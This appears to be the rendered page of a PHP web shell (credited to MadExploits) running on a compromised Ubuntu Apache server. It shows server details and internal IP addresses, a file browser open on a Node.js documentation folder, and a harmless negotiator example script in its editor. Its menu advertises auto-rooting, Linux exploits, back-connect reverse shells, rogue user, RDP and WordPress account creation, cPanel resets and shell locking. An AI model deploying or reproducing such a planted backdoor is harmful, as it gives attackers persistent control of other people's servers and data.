Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
node-negotiator /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
accept.js
1.2
KB
-rw-r--r--
charset.js
1.27
KB
-rw-r--r--
encoding.js
1.28
KB
-rw-r--r--
language.js
1.08
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : encoding.js
(function() { var Negotiator, gbuf, http, messages; Negotiator = require('../lib/negotiator').Negotiator; http = require('http'); gbuf = require('gzip-buffer'); messages = { identity: 'Hello World' }; gbuf.gzip(messages.identity, function(zipped) { var availableEncodings, key, server, val; messages.gzip = zipped; availableEncodings = (function() { var _results; _results = []; for (key in messages) { val = messages[key]; _results.push(key); } return _results; })(); console.log(availableEncodings); server = http.createServer(function(req, res) { var encoding, negotiator; negotiator = new Negotiator(req); console.log("Accept-Encoding: " + req.headers['accept-encoding']); console.log("Preferred: " + (negotiator.encodings())); console.log("Possible: " + (negotiator.encodings(availableEncodings))); encoding = negotiator.encoding(availableEncodings); console.log("Selected: " + encoding); if (encoding) { res.writeHead(200, { 'Content-Encoding': encoding }); return res.end(messages[encoding]); } else { res.writeHead(406); return res.end(); } }); return server.listen(8080); }); }).call(this);
Close